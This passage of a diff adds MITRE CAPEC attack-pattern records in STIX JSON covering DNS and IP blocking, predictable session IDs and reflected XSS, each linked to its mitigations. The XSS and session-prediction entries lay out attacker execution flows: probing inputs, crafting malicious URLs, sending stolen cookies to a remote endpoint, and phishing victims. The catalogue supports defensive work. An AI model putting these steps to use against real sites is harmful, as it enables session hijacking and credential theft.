"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use browser technologies that do not allow client-side scripting.", + "id": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--279f0698-c251-4497-8cf6-8dd35638757e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize proper character encoding for all output produced within client-site scripts manipulating the DOM.", + "id": "course-of-action--581c316a-7f9b-45f5-bb4d-b096f6162dab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6f81714-a1aa-46d0-ad1e-fdbfa6e5814e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--581c316a-7f9b-45f5-bb4d-b096f6162dab", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before use.", + "id": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--19dedc30-dbcc-4fd6-bad2-bade72cef5d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts traffic and intentionally drops DNS requests based on content in the request. In this way, the adversary can deny the availability of specific services or content to the user even if the IP address is changed.", + "external_references": [ + { + "external_id": "CAPEC-589", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/589.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Censorship in the Wild: Analyzing Internet Filtering in Syria, 2014, Sigcomm", + "external_id": "REF-473", + "source_name": "reference_from_CAPEC", + "url": "http://conferences2.sigcomm.org/imc/2014/papers/p285.pdf" + } + ], + "id": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DNS Blocking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Preventing DNS from resolving a request denies the availability of a target site or service for the user.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Full URL Based Filtering: Filtering based upon the requested URL.\n URL String-based Filtering: Filtering based upon the use of particular strings included in the requested URL.\n " + ], + "x_capec_prerequisites": [ + "This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hard Coded Alternate DNS server in applications", + "id": "course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--428bf1f5-901f-40d8-aeb9-ab5da829f74e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid dependence on DNS", + "id": "course-of-action--7e0432d6-34d5-4694-a138-b9561cac5a25", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2679eb47-74ab-4dab-8fa0-80041226d78e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e0432d6-34d5-4694-a138-b9561cac5a25", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Include \"hosts file\"/IP address in the application.", + "id": "course-of-action--e4470b31-8c3a-47da-a2b2-1fdf946e88f1", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f64c49e-d265-4f33-afbc-5434b791104b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e4470b31-8c3a-47da-a2b2-1fdf946e88f1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure best practices with respect to communications channel protections.", + "id": "course-of-action--278ea0bd-2f3e-44e3-8398-566da0f8b0a1", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59fe24de-1db9-45eb-8e29-7ca9bc4049d1", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--278ea0bd-2f3e-44e3-8398-566da0f8b0a1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a .onion domain with Tor support", + "id": "course-of-action--8fb9876b-b0f0-4204-b8dc-c89ee967c2c8", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--43839acc-f71a-4622-9a26-8bf9926bbfc4", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb9876b-b0f0-4204-b8dc-c89ee967c2c8", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.", + "external_references": [ + { + "external_id": "CAPEC-59", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-331", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/331.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-488", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Credential/Session Prediction", + "external_id": "18", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Credential/Session-Prediction" + }, + { + "description": "Session Prediction", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_Prediction" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Session Credential Falsification through Prediction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks. See also: CVE-2006-6969", + "mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication. See also: CVE-2001-1534" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find Session IDs: The attacker interacts with the target host and finds that session IDs are used to authenticate users.

    2. Techniques
    An attacker makes many anonymous connections and records the session IDs assigned.
    An attacker makes authorized connections and records the session tokens or credentials issued.

  2. Characterize IDs: The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable.

    3. Techniques
    Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections.
    Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs
    Comparison against time. The attacker plots or compares the issued IDs to the time they were issued to check for correlation.

Experiment

  1. Match issued IDs: The attacker brute forces different values of session ID and manages to predict a valid session ID.

    2. Techniques
    The attacker models the session ID algorithm enough to produce a compatible session IDs, or just one match.

Exploit

  1. Use matched Session ID: The attacker uses the falsified session ID to access the target system.

    2. Techniques
    The attacker loads the session ID into their web browser and browses to restricted data or functionality.
    The attacker loads the session ID into their network communications and impersonates a legitimate user to gain access to data or functionality.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host uses session IDs to keep track of the users.", + "Session IDs are used to control access to resources.", + "The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time)." + ], + "x_capec_skills_required": { + "Low": "There are tools to brute force session ID. Those tools require a low level of knowledge.", + "Medium": "Predicting Session ID may require more computation work which uses advanced analysis such as statistical analysis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a strong source of randomness to generate a session ID.", + "id": "course-of-action--331d7a82-5ec2-4222-9a34-3dd042df0332", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9653be54-5c63-4cb9-a759-0537fc56da14", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--331d7a82-5ec2-4222-9a34-3dd042df0332", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use adequate length session IDs", + "id": "course-of-action--26815e36-facf-44a4-98fa-472dec102e01", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2b5dfcf0-d8fd-4206-b790-076311f94f3b", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26815e36-facf-44a4-98fa-472dec102e01", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use information available to the user in order to generate session ID (e.g., time).", + "id": "course-of-action--c4b1f9f3-b1f6-4741-8fa9-b3ba8e8189ec", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--faa68fd6-54d2-4ba3-ad2b-1dd82865bae5", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4b1f9f3-b1f6-4741-8fa9-b3ba8e8189ec", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ideas for creating random numbers are offered by Eastlake [RFC1750]", + "id": "course-of-action--6d597339-bf05-4276-b31f-4cda813cd170", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c1ee684-47b3-455a-a377-97959a7a6492", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d597339-bf05-4276-b31f-4cda813cd170", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt the session ID if you expose it to the user. For instance session ID can be stored in a cookie in encrypted format.", + "id": "course-of-action--bd948cdf-d470-4ae5-a2fa-3183fe8eb425", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dafccdf5-4f55-4b8f-888e-9e37f2ccbbd5", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bd948cdf-d470-4ae5-a2fa-3183fe8eb425", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary performing this type of attack drops packets destined for a target IP address. The aim is to prevent access to the service hosted at the target IP address.", + "external_references": [ + { + "external_id": "CAPEC-590", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/590.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Abdelberi Chaabane, Terence Chen, Mathieu Cunche, Emiliano De Cristofaro, Arik Friedman, Mohamed Ali Kaafar, Censorship in the Wild: Analyzing Internet Filtering in Syria, 2014--02, IMC 2014", + "external_id": "REF-475", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "modified": "2019-04-04T00:00:00.000Z", + "name": "IP Address Blocking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Blocking packets intended for a target IP address denies its availability to the user.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Consider situations of information censorship for political purposes, where regimes that prevent access to specific web services." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a large pool of backup IPs built into the application and support proxy capability in the application.", + "id": "course-of-action--5e20e7f2-3b85-4548-9a70-bceee0970a14", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-590-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fba19fbc-d42f-448a-8713-882e084e8a75", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5e20e7f2-3b85-4548-9a70-bceee0970a14", + "target_ref": "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is \"reflected\" off a vulnerable web application and then executed by a victim's browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application.", + "external_references": [ + { + "external_id": "CAPEC-591", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/591.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives", + "external_id": "REF-476", + "source_name": "reference_from_CAPEC", + "url": "http://seclists.org/fulldisclosure/2005/Dec/1107" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-604", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Reflected XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful Reflected XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful Reflected attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application’s server-side code may want to display this mode value in the HTML page being created to give the users an understanding of what mode they are in. In this example, PHP is used to pull the value from the URL and generate the desired HTML.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim’s browser:\n http://my.site.com/aform.html?mode=\n ", + "\n Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. For example, assume a vulnerable web application called ‘mysite’ dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:\n Test URL\"?>\n The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker’s web page, such as:\n \"http://attackerswebsite.com?\"\n The vulnerable web application ('mysite') is now called via the attacker's web site, initiated by the victim's web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim’s web browser then executes the injected script, thus compromising the victim’s machine.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for reflected XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they were properly encoded, replaced, or filtered out.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_extended_description": "\n The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + 